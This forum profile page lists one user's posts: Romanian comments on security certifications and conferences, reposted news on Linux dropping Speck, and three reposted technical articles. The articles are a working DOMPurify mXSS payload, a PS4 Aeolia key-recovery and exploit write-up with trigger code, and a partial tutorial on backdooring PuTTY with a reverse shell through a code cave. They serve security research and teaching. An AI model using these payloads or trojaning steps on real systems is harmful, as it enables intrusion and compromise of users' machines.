-
Posts
18740 -
Joined
-
Last visited
-
Days Won
711
Everything posted by Nytro
-
Call for papers este inca deschis. Puteti aplica aici. Optiunile de sponsorizare sunt aici.
-
The Controversial Speck Encryption Code Will Indeed Be Dropped From The Linux Kernel Written by Michael Larabel in Linux Kernel on 4 September 2018 While Google got the NSA-developed Speck into the Linux kernel on the basis of wanting to use Speck for file-system encryption on very low-end Android (Go) devices, last month they decided to abandon those plans and instead work out a new "HPolyC" algorithm for use on these bottom-tier devices due to all the concerns over Speck potentially being back-doored by the US National Security Agency. After Google reverted their plans to use Speck for file-system encryption, it was called for removal from the Linux kernel with no other serious users of this code... Speck had been added to the crypto code in Linux 4.17 and then to the fscrypt bits for file-system encryption with Linux 4.18. But during the Linux 4.19 merge window that ended a week ago, the removal of Speck never occurred. While it didn't happen for this current kernel cycle, I noticed today that the speck removal patch has been merged into the development crypto code base by subsystem maintainer Herbert Xu. The patch merged overnight strips the kernel of Speck. This along with the start of other early crypto code will end up being merged into the next kernel cycle though the patch is also marked for stable back-porting to currently supported stable series. Sursa: https://www.phoronix.com/scan.php?page=news_item&px=Speck-Dropping-Next-Kernel
-
- 1
-
-
Dan Brown - Simbolul Pierdut
-
Hacker roman: https://twitter.com/aionescu Ce-i drept, nu locuieste in Romania, doar s-a nascut aici... Sper ca stiti cine e.
-
Cam asa ceva. Dar da bine la HR. Bine, serios vorbind, are valoarea ei. De fapt, ea nu e o certificare pentru "pentest" si una care ofera celui care o are cunostiinte generale de "security" din foarte multe arii. E utila pentru pozitii de management, deoarece "pentest" e doar o mica parte din ceea ce inseamna "security".
-
CISSP, dupa cum e si descris, incearca sa "acopere o arie larga, dar o adancime mica". Adica acopera foarte multe lucruri din domeniu IT/Information Security, insa nu intra in detalii. Am inteles ca incearca sa imbunatateasca CEH, si ca vor sa adauge lucruri practice, dar nu stiu daca au evoluat prea mult cu ultima versiune. Mai relevante pentru un penetration tester ar fi GXPN de la SANS - la care au si teste practice, si desigur, OSCP, unde ai un examen de 24 de ore (ca sa nu mai zic ca recent au introdus verificare si pentru a da examenul trebuie sa stai cu camera pornita, sa se asigure ca il dai tu si nu altcineva in locul tau).
-
Am si eu CISSP si nu prea m-a ajutat in cariera de Penetration Tester Si sunt probabil multi care au, dar probabil nu e de ajuns ca sa faca o treaba buna.
-
Inainte de conferinta, pe 25 septembrie, o sa fie si un meetup: https://www.facebook.com/events/524117008034356/
-
BSides Bucharest is a non-profit organization, independently run, community supported conference and part of the worldwide Security BSides movement. The idea behind the Security BSides Bucharest event is to organize a sales-pitch free Information Security community where professionals, experts, researchers, and InfoSec enthusiasts come together to discuss. Presenters – who should speak at the Bsides Bucharest 2018 Conference? IT Security professionals IT Security enthusiasts Companies, organisations and anyone else that is interested in the IT Security field. If you belong to one of those groups you are cordially invited to submit a talk proposal (or a number of proposals). Please submit your proposals here. Deadline is October 15, 2018 Please note: There is no guarantee that a submission will be put onto the conference agenda! The program committee picks the most interesting talk proposals and informs the selected submitters until 1st of November 2018. Any questions? Email organizers at contact@bsidesbucharest.org Detalii: https://bsidesbucharest.org
-
" Nice to have - one or more relevant certifications (CEH, CISSP, ...) "
-
Au inceput sa apara detalii: https://www.owasp.org/index.php/OWASP_Bucharest_AppSec_Conference_2018
-
Ba, copii prosti, ganditi si voi inainte sa faceti ceva.
- 1 reply
-
- 8
-
-
-
Din C#/Powershell se poate face orice se poate face si in C/C++, iar unele lucruri se pot face mai rapid. Cred ca de-asta se agita lumea cand e vorba de asa ceva, ca e mai putin code de scris, insa nu e nimic special. Nu m-am lovit mai de nimic deoarece nu am lucrat prea mult cu C# si .NET, insa poate sa faca multe. Ah, da, sigur, cu sanse mai sa fie "undetectable".
-
HTTPS Is Easy! No, really, it's dead simple. This 4-part series takes you through the basics of adding HTTPS for free with Cloudflare. Part 1: Adding HTTPS Let's start by getting HTTPS configured on the site and all non-secure requests redirecting to the secure scheme. Part 2: Optimising HTTPS Let's now configure HTTPS to be as secure as possible, surpassing "bank grade security" in just a few clicks. Part 3: Fixing Insecure References Insecure references in the HTML can take away browser indicators and put users at risk - let's fix them! Part 4: Encrypting Everything Secure all the traffic not just between the browser and Cloudflare, but all the way back to the server. A big thanks to the community for contributing closed captions in 17 different languages including: Czech, Danish, Dutch, English, Finnish, French, German, Greek, Indonesian, Italian, Norwegian, Persian, Polish, Russian, Slovenian, Spanish and Swedish. Powered by Cloudflare Built by Troy Hunt Read more about this initiative in the launch blog post. Sursa: https://httpsiseasy.com/
-
George Hotz, comma.ai Forget reversible debugging, why is it that the concept of time exists in debugging at all? Viewing execution as a timeless trace, the open source tool QIRA(qira.me) attempts to move debugging into a new paradigm. Battle tested in CTFs, I will be presenting the tool and showing off a 10x speedup in exploit development cycle. Sign up to find out more about Enigma conferences: https://www.usenix.org/conference/eni... Watch all Enigma 2016 videos at: http://enigma.usenix.org/youtube
-
- 1
-
-
In our presentation, we explain in detail how ME 11.x stores its state on the flash and the other types of file systems that are supported by ME 11.x. By Dmitry Sklyarov Full Abstract & Presentation Materials: https://www.blackhat.com/eu-17/briefi... How to Hack a Turned-Off Computer or Running Unsigned Code in Intel Management Engine: https://youtu.be/9fhNokIgBMU
-
Bypassing DOMPurify with mXSS Sunday, 29 July 2018 I noticed DOMPurify would let you use the title tag when injecting a self closing SVG. Normally it blocks title outside of SVG however using the self closing trick you could bypass that restriction. <svg/><title> Injecting the title tag is important because it mutates, as I’ve tweeted about in the past. In order for the mXSS to be effective I needed to inject the title tag outside of SVG as DOMPurify/Edge would correctly encode the HTML. I found you could use “x” as a self closing tag in DOMPurify and this would enable me to use the title tag outside of SVG. For example: IN: <x/><title>test OUT: <title>test</title> Great so I could get mXSS right? Well almost. I injected a mXSS vector with my “x” trick. IN: <x/><title></title><img src=1 onerror=alert(1)> OUT: <title></title><img src="1"> Damn, so DOMPurify was detecting the malicious HTML and removing the onerror attribute. But then I thought what if this attribute is being read multiple times, maybe I could inject a mXSS vector that mutates more than once. Here is the final vector that is encoding multiple times so it bypasses DOMPurify attribute checks. IN: <x/><title>&lt;/title&gt;&lt;img src=1 onerror=alert(1)&gt; OUT: <title></title><img src=1 onerror=alert(1)></title> The vector has been fixed in the latest version of Edge and also has been patched in DOMPurify version 1.0.7. If you want to experiment with the bypass then use DOMPurify 1.0.6 and Microsoft Edge 41.16299.547.0. Sursa: http://www.thespanner.co.uk/2018/07/29/bypassing-dompurify-with-mxss/
-
2018-07-30 PS4 Aux Hax 1: Intro & Aeolia By ps4_enthusiast Filed under ps4 vulnerability exploit In the PS4 Aux Hax series of posts, we’ll talk about hacking parts of the PS4 besides the main x86 cores of the APU. In this first entry, we’ll give some background for context and describe how we managed to run arbitrary code persistently on Aeolia, the PS4 southbridge. Not shown in this post are the many iterations of failure which lead to success. The blog would be much too long The subtitle should be “power analysis for noobs”. Intro (Overview of SAA-001) Most of our experimentation is conducted against the SAA-001 version of the PS4 motherboard. This is the initial hardware revision which was released around the end of 2013. There are a few obvious reasons for this: Older hardware revisions are more likely to be populated with older components, resulting in e.g. chips with legs instead of BGA, slower clocks, functionality in discrete parts, etc. Early designs likely have more signals brought out for debugging Used/defective boards can be acquired cheaply Readily available media from initial teardowns/depopulation by third parties (ifixit, siliconpr0n, etc.) Using the resources from siliconpr0n and simple tools, as many wires as possible were mapped on the board. The final pin mapping which I’ve used throughout the work for this blog series can be found here. Interesting components outside the APU The areas of interest for this post are shown here: External to the APU, the main attractions are the “southbridge” (generally known as Aeolia) and syscon chips. Each is involved in talking to various peripherals on the board as well as controlling power sequencing for other components. Taking control of Aeolia is useful as it allows getting a foothold on the board in order to easily access busses shared with other chips. For example, control of Aeolia should allow performing attacks similar to our previous PCIe man-in-the-middle DMA attack against the APU - using only devices already present on the board. It also would allow easy access to the icc (aka ChipComm) interfaces of FreeBSD running on x86 (via PCIe), as well as the icc interface implemented on syscon (over SPI). As Aeolia is kind of the southbridge for the APU, it naturally would allow intercepting any storage (sflash, ddr3, hdd, …) or networking accesses as well. Finally, Aeolia is a self-contained SoC with multiple ARM cores which provides a decently beefy environment for experimenting with. Syscon is also interesting for other reasons, which will be elaborated upon in a future post. Aeolia Sizing up the target Early on, it was easy to discover the following about Aeolia: The cores which are active during “rest mode” (APU S3 state) are called “EAP” EAP runs FreeBSD and some usermode processes which can be dumped from DDR3 for reversing Some other component inside Aeolia is likely named “EMC” A shared-memory based protocol named “icc” can be used to communicate with EMC EMC can proxy icc traffic with syscon to/from APU Firmware updates (encrypted and signed) are available for Aeolia At first, we just wanted to be able to decrypt firmware updates in order to inspect what Aeolia really does and how it works with the rest of the system. The components in the firmware were relatively easy to identify, because the naming scheme of files stored in the filesystem (2BLS: BootLoaderStorage) is a 32bit number which identifies the processor it’s for as well as a number which more or less relates to the order it’s used in the boot process. Firmware update packages for Aeolia are essentially just raw filesystem blobs which will be written to sflash, so it’s easy to extract individual firmware components from a given firmware update package. The files in sflash for Aeolia consist of: File Name Name Dst CPU Notes C0000001 ipl SRAM EMC first stage fetched from sflash C0010001 eap_kbl DDR3 EAP EMC loads to boot EAP; contains FreeBSD So, we want to find a way to decrypt the ipl, preferably “offline” i.e. such that we can just directly decrypt the firmware images from update files. Considering that the ipl must be read and decrypted from sflash each time Aeolia powers up, this sounds like a perfect candidate for key recovery via power analysis! Setting up shop Recovering the decryption key via well-known attacks such as Correlation Power Analysis should be possible as long as the input data (ciphertext) is controllable to some extent. Initially, everything about the cryptographic schemes for encryption and validation were unknown. This results in a bit of a chicken/egg problem: determining if it’s worthwhile to take power traces for an eventual CPA attack requires doing mostly the same work as the CPA attack itself. As there’s no way around setting up a PS4 for trace acquisition, I just got on with it. Above, a murderedmodified PS4 for EMC power analysis. From bottom left: sflash replaced with flash simulator on FPGA main Aeolia clock (100MHz spread-spectrum) replaced with slowed down clock (~8MHz, non-SSC) from FPGA. Clockgen is disabled to minimize noise. aux. crystal replaced with wire Just a floating wire, used to manually input a “clock cycle”, which seems needed to unblock power-on-reset sequence (not needed for resets which keep power on) (near top right of Aeolia) power trace, extends to back of board and connects to EMC core power plane. Decoupling caps have been removed. (blue wire) replaced, “clean” power supply for EMC (white wire, top right) FPGA GPIO hooked to SC-RESET (not shown) FPGA exports a copy of base clock for oscilloscope refclk The setup settled on was based around simulating sflash on an FPGA in order to get as fast iteration times as possible. This choice also allowed easily exploring the bootrom’s parsing of sflash and ipl (explained in the next section). The SC-RESET test point was used as a hammer to cause a full-board reset, implicitly causing EMC to be rebooted by syscon. As for analysis/software tooling, the advanced numpy and baudline tools were used to analyze traces and eventually run the CPA attack. Power analysis as debugger Because the ipl was initially an opaque blob, we first needed to discover how the bootrom would parse sflash to arrive at the ipl, and then how the ipl itself would be parsed before the decryption of the ipl body. Investigating this parsing allowed discovering which parts of the filesystem and ipl blob were used, at which time they were used, and the bounds of any fields involved in the parsing. Simply viewing and diffing power traces proved to be a very effective tool for this. It was possible to check for possible memory corruption/logic bugs in the bootrom by simply modifing filesystem structures or ipl header fields and checking the power trace for irregularities. For example, once we had a good guess which field of the ipl header was the load address, we could try changing it in the hopes of hitting e.g. stack region in SRAM, and then check the trace to see if execution appeared to continue past the normal failure point. Unfortunately a bug was not found in this parsing, but this step helped a lot in understanding the layout of the ipl header and which fields we could change to attempt key recovery. By using power analysis, we determined the header of the ipl blob looked like: struct aeolia_ipl_hdr { u32 magic; // 0xd48ff9aa u8 field_4; u8 field_5; u8 field_6; u8 proc_type; // 0x48: EMC, 0x68: EAP u32 hdr_len; u32 body_len; u32 load_addr_0; u32 load_addr_1; // one is probably entrypoint.. u8 fill_pattern[0x10]; // DE AD BE EF CA FE BE BE DE AF BE EF CA FE BE BE u8 key_seed[0x8]; // F1 F2 F3 F4 F5 F6 F7 F8 // key_seed is used as input to 4 aes operations (2 blocks each) // some output of those operations is used as the key to decrypt the // following 5 blocks u8 wrapped_thing[0x20]; u8 signature[0x30]; // offset 0x80 u8 body[body_len]; }; See the full notes, including discovered bounds and parsing rules here. This was my first experience with power analysis, and I was quite encouraged by the capabilities so far To show how this was done (well, at least the parts relating to fields used in crypto operations), observe the following spectrograms from baudline. Note: the time units are meaningless. Above is the trace of the bootrom beginning to process the ipl. If you squint a bit, you can tell there are 4 nearly identical sections, then a long section which seems to be an extended version of one of the first four. Afterwards, longer, more stable periods are visible. Above is the result of comparing 5 traces to a single “base” trace. The method of comparison was to modify the contents of each 0x10 byte block in the header in the range of wrapped_thing and signature in turn, then mux the resulting trace with the base trace. This allows easy experimentation with baudline. As shown, baudline is actually performing subtraction between “channels” to produce the useful output. This immediately gives good information about what a block looks like in the spectrogram, the time taken to process it, the fact that modifications to a single block don’t have much influence on successive blocks, and most importantly, that we can feed arbitrary input into some decryption step. This implies the signature check of the header is done after decryption of wrapped_thing. Digging into the crypto While the above seems to bode well, there’s actually a snag. It appears the bootrom uses wrapped_thing as input to a block cipher and then signature checks the header. So it seems possible to recover the key used with wrapped_thing, however it’s not clear if this will give us all information needed to decrypt the ipl body. Additionally, the header is signature checked, so we can’t use an improper key to decrypt an otherwise valid body, then have EMC jump into garbage and hope for the best. In any case, I decided to try for recovery of the key used with wrapped_thing and hope I’d be able to figure out how to turn that into decryption of the body. Baby’s first DPA Before attempting key recovery, one must first locate the exact locations in power traces which can be used to identify the cipher and extract information about the key. Starting from not much info (just know it’s a 0x10 byte block cipher), we can guess it’s probably AES and try to see if it makes sense. The method to do this is essentially the same as Differential Power Analysis: identify the probable location of the first sbox lookup, take a bunch of traces with varying input, then apply sum of absolute differences to determine if the acquired traces “look like” AES. Fortunately, this process yielded very straightforward results: (Sorry, you’ll probably need to open the images at full resolution to inspect them) ^ High level view of a complete block being passed through the cipher. If you squint you may be able to discern 10 rounds. The top is a singular raw trace, while the bottom group plots the sum of differences between all traces. ^ Closer view of the sum of differences. The above already makes it very likely to be AES. However, there is an additional check which may be done, which allows determining if the operation is encryption or decryption: ^ The same sum of differences, but making it obvious when, exactly, each bit position (of the input data) is used by the cipher. This can be easily correlated to most AES software implementations. For example, mbedtls: #define AES_RROUND(X0,X1,X2,X3,Y0,Y1,Y2,Y3) \ { \ X0 = *RK++ ^ AES_RT0( ( Y0 ) & 0xFF ) ^ \ AES_RT1( ( Y3 >> 8 ) & 0xFF ) ^ \ AES_RT2( ( Y2 >> 16 ) & 0xFF ) ^ \ AES_RT3( ( Y1 >> 24 ) & 0xFF ); \ // ... // in mbedtls_internal_aes_decrypt(...) GET_UINT32_LE( X0, input, 0 ); X0 ^= *RK++; GET_UINT32_LE( X1, input, 4 ); X1 ^= *RK++; GET_UINT32_LE( X2, input, 8 ); X2 ^= *RK++; GET_UINT32_LE( X3, input, 12 ); X3 ^= *RK++; for (i = (ctx->nr >> 1) - 1; i > 0; i--) { AES_RROUND(Y0, Y1, Y2, Y3, X0, X1, X2, X3); ///... With some squinting, it can be seen that the byte accesses generated by this first sbox lookup for decryption (and not encryption) matches the above plot. Recovering the key encryption key With the cipher used to process wrapped_thing more or less determined, we can switch to Correlation Power Analysis and attempt key recovery using only the section of traces which concern the first sbox lookup. Much time passes. Much confusion about how to filter traces ensues. Eventually, after tweaking the CPA method a bit and applying some filtering to ignore noise, the key recovery was successful! The correlation needed to be changed to use AES T-tables (the logic for which is actually described in the original AES proposal) instead of the standard inverted sbox approach. The hypothesized key was determined to be correct by running it though possible key derivation schemes which the bootrom would use, and then attempting to decrypt the first few blocks of the ipl body with the result. The winning combination was: # process blocks previously named wrapped_thing and signature # emc_header_key is the value recovered with CPA def emc_decrypt_header(hdr): return hdr[:0x30] + aes128_cbc_iv_zero_decrypt(emc_header_key, hdr[0x30:0x80]) hdr = emc_decrypt_header(f.read(0x80)) body_aes_key = hdr[0x30:0x40] body_len = struct.unpack('<L', hdr[0xc:0x10])[0] body = aes128_cbc_iv_zero_decrypt(body_aes_key, f.read(body_len)) Again, quite luckily the scheme is simple. Well, now what? Having originally only set out to decrypt ipl, we were, in some sense, done already. However, the exploratory power analysis revealed that the aeolia_ipl_hdr.key_seed could be used to cause the derived key to change. As such, any future firmware update which didn’t use the hardcoded key_seed of [F1 F2 F3 F4 F5 F6 F7 F8] would require redoing the key recovery. Quite unsavory! The determination of header field usages as well as reversing the (now decrypted) ipl also revealed that the “signatures” used to verify the ipl were likely just HMAC-SHA1 digests. In other words, the entire chain of trust on Aeolia is done with symmetric keys present inside every Aeolia chip. With the likely location of this HMAC key being the bootrom, we set out to dump the bootrom. Bootrom dumpin’ The chosen method of dumping EMC bootrom was by exploiting some software bug in ipl code. The first part of the ipl code to catch my eye while reversing was the UART protocol (called ucmd), which allows a small set of commands to be used to interact with EMC. The list of commands, along with privileges required to use the commands, is: Command Name Auth Level _hdmi INT boot A_AUTH bootadr A_AUTH bootenable A_AUTH bootmode A_AUTH buzzer A_AUTH cb A_AUTH cclog A_AUTH ccom INT ccul INT cec A_AUTH cktemprid A_AUTH csarea A_AUTH ddr A_AUTH ddrr A_AUTH ddrw A_AUTH devpm A_AUTH dled A_AUTH dsarea A_AUTH ejectsw A_AUTH errlog ANY etempr A_AUTH fdownmode A_AUTH fduty A_AUTH flimit A_AUTH fmode A_AUTH fservo A_AUTH fsstate A_AUTH fstartup A_AUTH ftable A_AUTH halt A_AUTH haltmode A_AUTH hdmir A_AUTH hdmis A_AUTH hdmistate A_AUTH hdmiw A_AUTH help INT mbu A_AUTH mduty A_AUTH nvscsum A_AUTH nvsinit A_AUTH osarea A_AUTH osstate A_AUTH pcie A_AUTH pdarea A_AUTH powersw A_AUTH powupcause A_AUTH r16 A_AUTH R16 A_AUTH R32 A_AUTH r32 A_AUTH R8 A_AUTH r8 A_AUTH resetsw A_AUTH rtc A_AUTH sb A_AUTH sbnvs A_AUTH scfupdbegin A_AUTH scfupddl A_AUTH scfupdend A_AUTH scnvsinit A_AUTH scpdis A_AUTH screset A_AUTH scversion ANY sdnvs A_AUTH smlog A_AUTH socdmode A_AUTH socuid A_AUTH ssbdis A_AUTH startwd A_AUTH state A_AUTH stinfo INT stopwd A_AUTH stwb A_AUTH syspowdown A_AUTH task INT tempr A_AUTH testpcie A_AUTH thrm A_AUTH uareq1 ANY uareq2 ANY version ANY W16 A_AUTH w16 A_AUTH W32 A_AUTH w32 A_AUTH w8 A_AUTH W8 A_AUTH wsc INT where ANY indicates the command is always available, A_AUTH means you must use the uareq commands to authenticate successfully, and INT most likely means “internal only”. A quick review of the ANY command set didn’t reveal exploitable vulnerabilities. However, it should be noted that the uareq commands are designed such that uareq1 allows you to request a challenge buffer, and uareq2 allows you to send a response. However, since the total challenge/response buffer size is larger than can fit in a single ucmd packet, the transfer is split into 5 chunks. Naturally the response cannot be verified until the complete response is received by EMC, so never sending the last chunk results in being able to place arbitrary data at a known static address in EMC SRAM. This will be useful later The next places to look were: Places data is read from sflash by EMC icc command handlers exposed to the APU No luck with bugs in sflash parsing paths :‘( Quite sad now, I focused on the APU-accessible icc interface. It turns out icc (at least as implemented on EMC) is quite complex. Handling a single message can cause many buffers to be allocated, queued, copied, and free’d multiple times. The system also supports acting as a proxy for other icc endpoints (syscon and emc uart). In any case, a usable bug was found relatively quickly in some hdmi-related icc command handler: /* Call stack: HdmiSeqTable_setReg HdmiSeqTable_execSubCmd sub_1170BA hcmd_srv_10_deliver */ int HdmiSeqTable_setReg(HdmiSubCmdHdr *cmd, int a2, int a3, void *a4, int first_exec, void *a6) { int item_type; // r0 int num_items; // r5 u8 *buf; // r4 int i; // r0 HdmiEdidRegInfo *v12; // r1 item_type = cmd->abstract; num_items = cmd->num; if (first_exec) return; buf = (u8 *)&cmd[1]; switch (item_type) { case 1: { HdmiEdidRegInfo *src = (HdmiEdidRegInfo *)buf; for (i = 0; i < num_items; ++i) { // edid_regs_info is HdmiEdidRegInfo[4] in .data // addr is 0x152E3B in this case v12 = &edid_regs_info[i]; v12->field_0 = src->field_0; v12->field_1 = src->field_1; v12->field_2 = src->field_2; src++; } } break; //... } //... } This is an amusingly annoying primitive: starting from a static address, we can continously write 3 of every 4 bytes (see below for struct definitions). Since the base address (0x152E3B) is not naturally aligned, and all pointers stored in memory will be aligned, this becomes somewhat annoying. Also, the overwrite will trample over everything within range, so the closest corruption target as possible is needed. Luckily, there is a good target: The OS’s task objects are stored nearby. The OS appears to be some version of ThreadX with a uITRON wrapper. In any case, the struct being overwritten looks like: 00000000 ui_tsk struc ; (sizeof=0x130, mappedto_101) 00000000 00000000 tsk_obj TX_THREAD ? ... 00000000 TX_THREAD struc ; (sizeof=0xAC, align=0x4, mappedto_102) 00000000 00000000 tx_thread_id DCD ? 00000004 tx_thread_run_count DCD ? 00000008 tx_thread_stack_ptr DCD ? ... Considering aligment, low 2 bytes of the tx_thread_stack_ptr can be controlled by the overwrite, and the rest of the structure need not be corrupted. This is perfect, as ThreadX uses the field like so: ROM:00111E60 LDR.W R12, [R3,#TX_THREAD.tx_thread_stack_ptr] ROM:00111E64 LDMIA.W R12!, {R4-R11} ROM:00111E68 MSR.W PSP, R12 ROM:00111E6C MOV LR, #0xFFFFFFFD ROM:00111E70 BX LR In other words, if we can point tx_thread_stack_ptr at some controlled memory, we get control of all GPRs, including SP. And since it’s returning from interrupt, PC and PSR as well. With great luck, the buffer used by uareq2 is able to be reached just by changing the low 2 bytes (well, mainly because SRAM is so small, and the stacks are statically allocated in a convenient position). The exploit method is: Place a fake exception frame at a known address with ucmd uareq2. Use the bug to overwrite the tx_thread_stack_ptr of a task. Wait for the runtime to switch tasks and resume the thread via the modified tx_thread_stack_ptr. Sending UART traffic forces task switching, so we can get control instantly. Exception frame placing (via UART): ucmd_ua_buf = 0x15AD90 r0 = r1 = r2 = r3 = r4 = r5 = r6 = r7 = r8 = r9 = r10 = r11 = r12 = 0 lr = pc = psr = 0 r6 = 0 # src r7 = 0xffff # len pc = 0x135B94 | 1 # print loop lr = pc psr = 1 << 24 fake_frame = struct.pack('<%dL' % (8 + 5 + 3), r4, r5, r6, r7, r8, r9, r10, r11, r0, r1, r2, r3, r12, lr, pc, psr) uc.uareq2(fake_frame) 0x135B94 is part of the inner loop of a hexdump-like function. This will result in spewing the bootrom (located @ addr 0 in EMC address space) out of UART. Perfect! Trigger code (via icc from APU): struct PACKED HdmiSubCmdTopHdr { u8 abstract; u16 size; u8 num_subcmd; }; struct PACKED HdmiSubCmdHdr { u8 ident; u8 size; u8 abstract; u8 num; }; struct PACKED HdmiEdidRegInfo { u8 field_0; u8 field_1; u8 field_2; u8 _unused; }; struct PACKED ArmExceptFrame { // r4-r11 saved/restored by threadx u32 tx_regs[8]; u32 r0; u32 r1; u32 r2; u32 r3; u32 r12; u32 lr; u32 pc; u32 xpsr; }; void Icc::Pwn() { // the last HdmiEdidRegInfo will overlap // &ui_tsk_objs[1].tsk_obj.tx_thread_stack_ptr size_t num_infos = 232; size_t hdrs_len = sizeof(HdmiSubCmdTopHdr) + sizeof(HdmiSubCmdHdr); size_t infos_len = num_infos * sizeof(HdmiEdidRegInfo); size_t buf_len = hdrs_len; buf_len += infos_len; buf_len += sizeof(ArmExceptFrame); buf_len += 0x20; auto buf = std::make_unique<u8[]>(buf_len); memset(buf.get(), 0, buf_len); auto hdr_top = (HdmiSubCmdTopHdr *)buf.get(); auto hdr = (HdmiSubCmdHdr *)(hdr_top + 1); auto infos = (HdmiEdidRegInfo *)(hdr + 1); auto stack_ptr_overlap = &infos[num_infos - 1]; //auto fake_frame = (ArmExceptFrame *)(infos + num_infos); hdr_top->abstract = 0; hdr_top->size = buf_len; hdr_top->num_subcmd = 1; hdr->ident = 4; // not checked hdr->size = infos_len; hdr->abstract = 1; hdr->num = num_infos; // control lower 2bytes of tx_thread_stack_ptr // needs to point to fake_frame u32 ucmd_ua_buf = 0x15AD90; u32 fake_frame_addr = ucmd_ua_buf; printf("fake frame %8x %8x\n", fake_frame_addr, fake_frame_addr + 8 * 4); stack_ptr_overlap->field_1 = fake_frame_addr & 0xff; stack_ptr_overlap->field_2 = (fake_frame_addr >> 8) & 0xff; uintptr_t x = (uintptr_t)&stack_ptr_overlap->field_1; uintptr_t y = (uintptr_t)infos; printf("%8lx %8lx %8lx %8lx\n", x, y, x - y, 0x152E3B + x - y); HdmiSubCmd(buf.get(), buf_len); } …and yes, it worked Ok, NOW what? With the bootrom in hand, it was now possible to see the actual key derivation in friendly ARM code form. The bootrom does contain a lot of key material, however it mixes the values stored in ROM with a value read from fuses in addition to the key_seed from ipl header. Unfortunately, even with arbitrary code exec on EMC, the fused secret cannot be dumped - it just reads as all-0xff. Inspecting the bootrom code shows that it appears to set a mmio register bit to lock-out the fuse key until the next power cycle. At first it looks as if we’re stuck again. But, let’s take a closer look at how bootrom uses the fuse key: int decrypt_with_seed(_DWORD *data_out, emc_hdr *hdr, int *data_in, _DWORD *key) { u8 v6[32]; // [sp+8h] [bp-108h] u8 rk[0xc0]; // [sp+28h] [bp-E8h] u8 iv[16]; // [sp+E8h] [bp-28h] *(_QWORD *)v6 = hdr->key_seed; *(_QWORD *)&v6[8] = hdr->key_seed; *(_DWORD *)&v6[16] = *data_in; *(_DWORD *)&v6[20] = data_in[1]; *(_DWORD *)&v6[24] = data_in[2]; *(_DWORD *)&v6[28] = data_in[3]; *(_DWORD *)iv = 0; *(_DWORD *)&iv[4] = 0; *(_DWORD *)&iv[8] = 0; *(_DWORD *)&iv[12] = 0; if (aes_key_expand_decrypt(key, rk) < 0 || aes_cbc_decrypt(v6, v6, 0x20u, rk, iv) < 0) { return -1; } *data_out = *(_DWORD *)&v6[16]; data_out[1] = *(_DWORD *)&v6[20]; data_out[2] = *(_DWORD *)&v6[24]; data_out[3] = *(_DWORD *)&v6[28]; return 0; } // in main(): //... // read fuse key to stack *(_DWORD *)v98 = unk_5F2C5050; *(_DWORD *)&v98[4] = unk_5F2C5054; *(_DWORD *)&v98[8] = unk_5F2C5058; *(_DWORD *)&v98[12] = unk_5F2C505C; if (dword_5F2C504C == 1) { // re-executing rom code (fuse already locked)? then bail *(_DWORD *)v98 = 0; *(_DWORD *)&v98[4] = 0; *(_DWORD *)&v98[8] = 0; *(_DWORD *)&v98[12] = 0; return 0x86000005; } // lock fuse interface dword_5F2C504C = 1; // derive the keys using rom values, header seed, with fuse value as key // rom_constant_x are values stored in bootrom if ( decrypt_with_seed(emc_header_aes_key, &hdr, rom_constant_0, v98) < 0 || decrypt_with_seed(emc_header_hmac_key, &hdr, rom_constant_1, v98) < 0) { return 0x86000005; } //... (also yes, I did check if the fuse key remains on the stack. It doesn’t.) Hm…so we can easily feed arbitrary data into the key derivation by modifying the key_seed, and we know the first 16 byte block is just the 8 byte key_seed repeated twice. Smells like a job for CPA again! Recovering the fuse key Adjusting the power tracing setup slightly to collect data from a different time offset and modifying the header generation code to target the key_seed instead of wrapped_thing were the only changes needed to acquire suitable traces. In the analysis phase, the only change needed was to account for the data always consisting of a duplicated 8bytes. My workaround for this was to rely on the fact that the temporal location where each byte should be processed is well known (recall the mbedtls code from a previous section). Instead of taking just the top match per byte position from CPA results, I took the top two matches and placed them into the recovered key based on the temporal position of the match. This finally resulted in acquiring all keys stored inside Aeolia (at least, the revision on SAA-001, it seems other revisions used different keysets). Thus, we can freely encrypt and sign our own ipl, and therefor control all code being executed on Aeolia, forever Recommended reading Introduction to differential power analysis - IMO the most clear rationale of DPA Side-Channel Power Analysis of a GPU AES Implementation - Touches on T-table usage Greetz Thanks to Volodymyr Pikhur for the previous work done on EAP and EMC (some can be seen here) and flatz, who has helped with reversing and bug hunting. Sursa: https://fail0verflow.com/blog/2018/ps4-aeolia/
-
Backdoring PE files using code caves : OSCE/CTP Module 0x03 July 24, 2018 Hello Readers, This post will cover Backdooring of P.E file by using code caves . There are already good tools to do this for you eg. Backdoor Factory and Shelter which will do the same job and even bypass some static analysis of few antiviruses . I will be covering the manual approach of backdooring a PE file . Let's understand some terms : [x] PE file : The Portable Executable (PE) format is a file format for executables, object code, and DLLs, used in 32-bit and 64-bit versions of Windows operating systems. [x] Code Cave : Wikipedia says - "A code cave is a series of null bytes in a process's memory. The code cave inside a process's memory is often a reference to a section of the code’s script functions that have capacity for the injection of custom instructions. For example, if a script’s memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes can be used to add external code to the script." [x] Shellcode : Wikipedia - "A shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode." Let's get started .... You can download the Putty version which I have used from here . I will be using Immunity Debugger for debugging purposes.You can use any other debugger like Ollydbg. First we need to find the available code cave spaces where we can insert our malicious code.You can either add a section or modify an existing section and use the available code cave spaces. I have used cave-miner script to locate available unused bytes. Okey, so cave begins from 00445CD5. I will inject my shellcode from 00445CD6. I will be hijacking the entry point of the program and redirect the execution flow to our shellcode. First of all , we have to make .data section executable using Lord P.E or any P.E header editor tool. Once it is done , we need to copy the first few instructions of the entry point and save it somewhere in notepad. Insert the first instruction as JMP 00445CD6 which will help in redirection of the execution flow to our newly discovered code cave space. Once the entry point instructions are replcaed by JMP instruction then we need to note down what instructions are overwritten and those need to be restore later. Now , let's understand the backdoor part - 1. PUSHAD 2. PUSHFD 3. Shellcode 4. Stack Allignment 5. POPFD 6. POPAD 7. RETORE instructions 8. JMP to next instruction PUSHAD instruction is equivilent to writing: Push EAX Push ECX Push EDX Push EBX Push ESP Push EBP Push ESI Push EDI POPAD pops the values back off the stack in reverse order, thus restoring all the register values. PUSHAD and POPAD are useful for performing a easy save and restore of the general purpose registers without having to PUSH and POP every individual register in turn. Similarly, PUSHFD and POPFD are used to save and restore the EFLAGS register. Generate a reverse tcp shellcode from msvenom in hex format and Binary paste in code cave space after PUSHFD instruction. Note down ESP value before shellcode execution and after shellcode execution for finding the difference and aligning the stack. Before shellcode - After shellcode - Difference = 0018FF68 - 